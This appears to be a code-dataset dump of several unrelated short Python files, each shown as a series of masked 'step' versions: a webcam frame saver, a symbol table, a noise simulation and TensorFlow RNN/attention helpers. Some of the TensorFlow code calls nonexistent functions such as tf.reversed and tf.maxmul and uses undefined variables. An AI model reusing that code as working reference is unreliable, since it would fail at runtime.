"step-2": "<mask token>\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\n<mask token>\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nwebcam = cv2.VideoCapture(0)\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\nsample_num = 0\ncaptured_num = 0\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nwebcam = cv2.VideoCapture(0)\nif not webcam.isOpened():\n print('Could not open webcam')\n exit()\nsample_num = 0\ncaptured_num = 0\nwhile webcam.isOpened():\n status, frame = webcam.read()\n sample_num = sample_num + 1\n if not status:\n break\n cv2.imshow('captured frames', frame)\n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img' + str(captured_num) + '.jpg', frame)\n sample_num = 0\n if cv2.waitKey(1) & 255 == ord('q'):\n break\nwebcam.release()\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\n \n# open webcam (웹캠 열기)\nwebcam = cv2.VideoCapture(0)\n \nif not webcam.isOpened():\n print(\"Could not open webcam\")\n exit()\n \n \nsample_num = 0 \ncaptured_num = 0\n \n# loop through frames\nwhile webcam.isOpened():\n \n # read frame from webcam \n status, frame = webcam.read()\n sample_num = sample_num + 1\n \n if not status:\n break\n \n # display output\n cv2.imshow(\"captured frames\", frame)\n \n if sample_num == 4:\n captured_num = captured_num + 1\n cv2.imwrite('./images/img'+str(captured_num)+'.jpg', frame)\n sample_num = 0\n \n \n # press \"Q\" to stop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# release resources\nwebcam.release()\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
class Symbol(object):
pass
class Fundef(Symbol):
def __init__(self, name, type, args):
self.name = name
self.type = type
self.args = args
class VariableSymbol(Symbol):
def __init__(self, name, type):
self.name = name
self.type = type
class Scope(object):
def __init__(self, parent, name):
self.parent = parent
self.name = name
self.entries = dict()
def put(self, name, symbol):
self.entries[name] = symbol
def get(self, name):
return self.entries[name]
def has_entry(self, name):
return self.entries.has_key(name)
def name(self):
return self.name
class SymbolTable(object):
def __init__(self, scope_name):
root_scope = Scope(None, scope_name)
self.scopes = dict()
self.scopes[scope_name] = root_scope
self.scope = root_scope
def push_scope(self, scope_name):
if not self.scopes.has_key(scope_name):
self.scopes[scope_name] = Scope(self.scope, scope_name)
self.set_scope(scope_name)
def pop_scope(self):
self.set_scope(self.scope.parent.name)
def set_scope(self, scope_name):
if self.scopes.has_key(scope_name):
self.scope = self.scopes[scope_name]
def put(self, name, symbol):
self.scopes[self.scope.name].put(name, symbol)
def get(self, name, scope=None):
scope_name = scope.name if scope != None else self.scope.name
if self.exists(name, scope=scope):
return self.scopes[scope_name].get(name)
def exists(self, name, scope=None):
scope_name = scope.name if scope != None else self.scope.name
return self.scopes[scope_name].has_entry(name)
def scope_exists(self, scope_name):
return self.scopes.has_key(scope_name)
def current_scope(self):
return self.scope.name
def find(self, name):
scope = self.scope
while scope != None:
if self.exists(name, scope=scope):
return self.get(name, scope=scope)
scope = scope.parent
def __str__(self):
s = ""
for scope_name, scope in self.scopes.iteritems():
s += str(scope_name) + ':\n'
for entry in scope.entries:
s += '\t' + str(entry) + ': ' + str(scope.entries[entry])
return s
|
normal
|
{
"blob_id": "6cc23e370d1ec1e3e043c3fa6819f9166b6e3b40",
"index": 4434,
"step-1": "<mask token>\n\n\nclass Scope(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-2": "<mask token>\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n <mask token>\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-3": "<mask token>\n\n\nclass VariableSymbol(Symbol):\n <mask token>\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-4": "<mask token>\n\n\nclass Fundef(Symbol):\n\n def __init__(self, name, type, args):\n self.name = name\n self.type = type\n self.args = args\n\n\nclass VariableSymbol(Symbol):\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = ''\n for scope_name, scope in self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry 
in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-5": "#!/usr/bin/python\n\n\nclass Symbol(object):\n pass\n\n\nclass Fundef(Symbol):\n\n def __init__(self, name, type, args):\n self.name = name\n self.type = type\n self.args = args\n\n\nclass VariableSymbol(Symbol):\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n\nclass Scope(object):\n\n def __init__(self, parent, name):\n self.parent = parent\n self.name = name\n self.entries = dict()\n\n def put(self, name, symbol):\n self.entries[name] = symbol\n\n def get(self, name):\n return self.entries[name]\n\n def has_entry(self, name):\n return self.entries.has_key(name)\n\n def name(self):\n return self.name\n\n\nclass SymbolTable(object):\n\n def __init__(self, scope_name):\n root_scope = Scope(None, scope_name)\n\n self.scopes = dict()\n self.scopes[scope_name] = root_scope\n self.scope = root_scope\n\n def push_scope(self, scope_name):\n if not self.scopes.has_key(scope_name):\n self.scopes[scope_name] = Scope(self.scope, scope_name)\n self.set_scope(scope_name)\n\n def pop_scope(self):\n self.set_scope(self.scope.parent.name)\n\n def set_scope(self, scope_name):\n if self.scopes.has_key(scope_name):\n self.scope = self.scopes[scope_name]\n\n def put(self, name, symbol):\n self.scopes[self.scope.name].put(name, symbol)\n\n def get(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n\n if self.exists(name, scope=scope):\n return self.scopes[scope_name].get(name)\n\n def exists(self, name, scope=None):\n scope_name = scope.name if scope != None else self.scope.name\n return self.scopes[scope_name].has_entry(name)\n\n def scope_exists(self, scope_name):\n return self.scopes.has_key(scope_name)\n\n def current_scope(self):\n return self.scope.name\n\n def find(self, name):\n scope = self.scope\n while scope != None:\n if self.exists(name, scope=scope):\n return self.get(name, scope=scope)\n scope = scope.parent\n\n def __str__(self):\n s = \"\"\n for scope_name, scope in 
self.scopes.iteritems():\n s += str(scope_name) + ':\\n'\n for entry in scope.entries:\n s += '\\t' + str(entry) + ': ' + str(scope.entries[entry])\n return s\n",
"step-ids": [
14,
17,
19,
22,
24
]
}
|
[
14,
17,
19,
22,
24
] |
import math,random,numpy as np
def myt():
x=[0]*10
y=[]
for i in range(100000):
tmp = int(random.random()*10)
x[tmp] = x[tmp]+1
tmpy=[0]*10
tmpy[tmp] = 1
for j in range(10):
tmpy[j] = tmpy[j] + np.random.laplace(0,2,None)
y.append(tmpy)
result=[0]*10
for i in range(10):
for j in range(100000):
result[i] = result[i]+y[j][i]
print x
print result
if __name__ == '__main__':
myt()
|
normal
|
{
"blob_id": "7b7705cdaa8483f6abbc3f4fb3fa1ca506742da8",
"index": 6042,
"step-1": "import math,random,numpy as np\n\ndef myt():\n x=[0]*10\n y=[]\n for i in range(100000):\n tmp = int(random.random()*10)\n x[tmp] = x[tmp]+1\n tmpy=[0]*10\n tmpy[tmp] = 1\n for j in range(10):\n tmpy[j] = tmpy[j] + np.random.laplace(0,2,None)\n y.append(tmpy)\n result=[0]*10\n for i in range(10):\n for j in range(100000):\n result[i] = result[i]+y[j][i]\n print x\n print result\n\nif __name__ == '__main__':\n myt()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
print('Boolean Exercise')
print(False or False)
print(False and False)
print(not True or not False)
|
normal
|
{
"blob_id": "2385882f040ef4bd0a3611bebfbb2ae5b3cd1dc6",
"index": 4204,
"step-1": "<mask token>\n",
"step-2": "print('Boolean Exercise')\nprint(False or False)\nprint(False and False)\nprint(not True or not False)\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import tensorflow as tf
from rnn_cells import gru_cell, lstm_cell
from tensorflow.python.ops import rnn
def shape_list(x):
ps = x.get_shape().as_list()
ts = tf.shape(x)
return [ts[i] if ps[i] is None else ps[i] for i in range(len(ps))]
def bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):
with tf.variable_scope(scope) as sc:
# forward pass
hs_fw = []
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')
hs_fw.append(h_fw)
# backward pass
hs_bw = []
for idx, x in enumerate(tf.reversed(X)):
if idx > 0:
sc.reuse_variables()
h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')
hs_bw.append(h_bw)
# stack outputs
hs_fw = tf.stack(hs_fw)
hs_bw = tf.reversed(tf.stack(hs_bw), 0)
# concat outputs and states
X = tf.concat((hs_fw, hs_bw), 2)
c = tf.concat((c_fw, c_bw), 1)
h = tf.concat((h_fw, h_bw), 1)
return X, c, h
def bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):
with tf.variable_scope(scope) as sc:
# forward pass
hs_fw = []
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
h_fw = gru_cell(x, h_fw, 'fw_gru_cell')
hs_fw.append(h_fw)
# backward pass
hs_bw = []
for idx, x in enumerate(reversed(X)):
if idx > 0:
sc.reuse_variables()
h_bw = gru_cell(x, h_bw, 'bw_gru_cell')
hs_bw.append(h_bw)
# stack outputs
hs_fw = tf.stack(hs_fw)
hs_bw = tf.reversed(tf.stack(hs_bw), 0)
# concat outputs and states
X = tf.concat((hs_fw, hs_bw), 2)
h = tf.concat((h_fw, h_bw), 1)
return X, h
def stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):
with tf.variable_scope(scope) as sc:
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
# handle the stack of lstm_cells
for i in range(depth):
h, c = lstm_cell(x, cs[i], hs[i], units, scope="cell_%d" % i)
# add residual connections after specified depth
if i >= non_res_depth:
x = h + x
cs[i] = c
hs[i] = h
X[idx] = h
return X, cs, hs
def stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):
with tf.variable_scope(scope) as sc:
for idx, x in enumerate(X):
if idx > 0:
sc.reuse_variables()
# hande the stack of lstm_cells
for i in range(depth):
h, c = gru_cell(x, hs[i], units, scope="cell_%d" % i)
# add residual connections after specified depth
if i >= non_res_depth:
x = h + x
hs[i] = h
X[idx] = h
return X, hs
def _luong_attn(h, e_out_W, e_out):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])
a = tf.nn.softmax(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])
return ctx
def _bahdanau_attn(h, e_out_W, e_out):
w_q_attn = tf.get_variable("w_q_attn", [units, units], initializer=tf.random_normal_initializer(stddev=0.02))
v = tf.get_variable("attn_v", [units], dtype=dtype)
h = tf.maxmul(h, w_q_attn)
return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])
def _simple_norm(inp, axis=1):
return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)
def _temp_attn(h, e_out_W, e_out, score_sum, time):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b=True), [1])
score = tf.cond(time > 0, lambda: tf.exp(score)/(score_sum+1e-12), lambda: tf.exp(score))
a = _simple_norm(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])
return ctx, score_sum + score
def _dec_attn(h, d_hsW, d_hs):
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), d_hsW, transpose_b=True), [1])
a = tf.nn.softmax(score)
ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), d_hs), [1])
return ctx
|
normal
|
{
"blob_id": "e550a2d46e46f0e07d960e7a214fbaa776bab0d5",
"index": 4697,
"step-1": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\n<mask token>\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\n<mask token>\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n 
=True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\n<mask token>\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n 
score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= 
non_res_depth:\n x = h + x\n hs[i] = h\n X[idx] = h\n return X, hs\n\n\n<mask token>\n\n\ndef _bahdanau_attn(h, e_out_W, e_out):\n w_q_attn = tf.get_variable('w_q_attn', [units, units], initializer=tf.\n random_normal_initializer(stddev=0.02))\n v = tf.get_variable('attn_v', [units], dtype=dtype)\n h = tf.maxmul(h, w_q_attn)\n return tf.reduce_sum(v * tf.tanh(e_out_W + h), [2])\n\n\ndef _simple_norm(inp, axis=1):\n return inp / tf.expand_dims(tf.reduce_sum(inp, axis), 1)\n\n\ndef _temp_attn(h, e_out_W, e_out, score_sum, time):\n score = tf.squeeze(tf.matmul(tf.expand_dims(h, 1), e_out_W, transpose_b\n =True), [1])\n score = tf.cond(time > 0, lambda : tf.exp(score) / (score_sum + 1e-12),\n lambda : tf.exp(score))\n a = _simple_norm(score)\n ctx = tf.squeeze(tf.matmul(tf.expand_dims(a, 1), e_out), [1])\n return ctx, score_sum + score\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef shape_list(x):\n ps = x.get_shape().as_list()\n ts = tf.shape(x)\n return [(ts[i] if ps[i] is None else ps[i]) for i in range(len(ps))]\n\n\ndef bi_dir_lstm(X, c_fw, h_fw, c_bw, h_bw, units, scope='bi_dir_lstm'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw, c_fw = lstm_cell(x, c_fw, h_fw, 'fw_lstm_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(tf.reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw, c_bw = lstm_cell(x, c_bw, h_bw, 'bw_lstm_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n c = tf.concat((c_fw, c_bw), 1)\n h = tf.concat((h_fw, h_bw), 1)\n return X, c, h\n\n\ndef bi_dir_gru(X, h_fw, h_bw, units, scope='bi_dir_gru'):\n with tf.variable_scope(scope) as sc:\n hs_fw = []\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n h_fw = gru_cell(x, h_fw, 'fw_gru_cell')\n hs_fw.append(h_fw)\n hs_bw = []\n for idx, x in enumerate(reversed(X)):\n if idx > 0:\n sc.reuse_variables()\n h_bw = gru_cell(x, h_bw, 'bw_gru_cell')\n hs_bw.append(h_bw)\n hs_fw = tf.stack(hs_fw)\n hs_bw = tf.reversed(tf.stack(hs_bw), 0)\n X = tf.concat((hs_fw, hs_bw), 2)\n h = tf.concat((h_fw, h_bw), 1)\n return X, h\n\n\ndef stacked_lstm(X, cs, hs, units, depth, non_res_depth, scope='stacked_lstm'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = lstm_cell(x, cs[i], hs[i], units, scope='cell_%d' % i)\n if i >= non_res_depth:\n x = h + x\n cs[i] = c\n hs[i] = h\n X[idx] = h\n return X, cs, hs\n\n\ndef stacked_gru(X, hs, units, depth, non_res_depth, scope='stacked_gru'):\n with tf.variable_scope(scope) as sc:\n for idx, x in enumerate(X):\n if idx > 0:\n sc.reuse_variables()\n for i in range(depth):\n h, c = gru_cell(x, hs[i], units, scope='cell_%d' % i)\n if i >= 
